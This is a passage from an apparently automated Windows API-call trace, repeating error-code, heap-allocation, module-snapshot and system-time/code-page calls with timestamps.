(dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.757] SetLastError (dwErrCode=0x0) [0113.757] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.758] GetLastError () returned 0x0 [0113.758] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.759] SetLastError (dwErrCode=0x0) [0113.759] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.760] SetLastError (dwErrCode=0x0) [0113.760] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.761] SetLastError (dwErrCode=0x0) [0113.761] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.762] SetLastError (dwErrCode=0x0) [0113.762] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.763] SetLastError (dwErrCode=0x0) [0113.763] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.764] SetLastError (dwErrCode=0x0) [0113.764] GetLastError () returned 0x0 [0113.817] SetLastError (dwErrCode=0x0) [0113.817] GetLastError () returned 0x0 [0113.817] SetLastError (dwErrCode=0x0) [0113.817] GetLastError () returned 0x0 [0113.817] SetLastError (dwErrCode=0x0) [0113.817] GetLastError () returned 0x0 [0113.817] SetLastError (dwErrCode=0x0) [0113.817] GetLastError () returned 0x0 [0113.817] SetLastError (dwErrCode=0x0) [0113.817] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] GetLastError () returned 0x0 [0113.818] SetLastError (dwErrCode=0x0) [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x98) returned 0x261a10 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x261ab0 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x261ad8 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x37) returned 0x261b18 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x261b58 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x261ba0 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261be0 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261c00 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x261c30 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd) returned 0x261c50 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x25) returned 0x261c68 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x39) returned 0x261c98 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261ce0 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261d00 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x261d20 [0113.818] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x69) returned 0x261d38 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x261db0 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261df8 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1d) returned 0x261e20 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x261e48 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x261e98 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261eb8 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261ed8 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261f00 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x261f30 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x261f68 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x261f90 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261fe8 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x262008 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x262020 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x262040 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x262078 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x2620b0 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x2620d0 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x2620f8 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x262130 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x262150 [0113.819] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x262170 [0113.819] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2611f8 | out: hHeap=0x260000) returned 1 [0113.820] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2621c0 [0113.820] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x2611f8 [0113.821] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0113.821] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x2611f8) returned 0x80 [0113.821] GetLastError () returned 0x0 [0113.821] SetLastError (dwErrCode=0x0) [0113.821] GetLastError () returned 0x0 [0113.821] SetLastError (dwErrCode=0x0) [0113.821] GetLastError () returned 0x0 [0113.821] SetLastError (dwErrCode=0x0) [0113.821] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.822] SetLastError (dwErrCode=0x0) [0113.822] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] SetLastError (dwErrCode=0x0) [0113.823] GetLastError () returned 0x0 [0113.823] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0113.823] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0113.824] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0113.824] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0113.826] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0113.826] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0113.826] GetTickCount () returned 0x114d920 [0113.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.826] GetACP () returned 0x4e4 [0113.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.826] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.826] GetACP () returned 0x4e4 [0113.826] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.827] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.827] GetACP () returned 0x4e4 [0113.827] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.828] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.828] GetACP () returned 0x4e4 [0113.828] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.829] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.829] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.829] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.830] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.830] GetACP () returned 0x4e4 [0113.830] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.831] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.831] GetACP () returned 0x4e4 [0113.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: 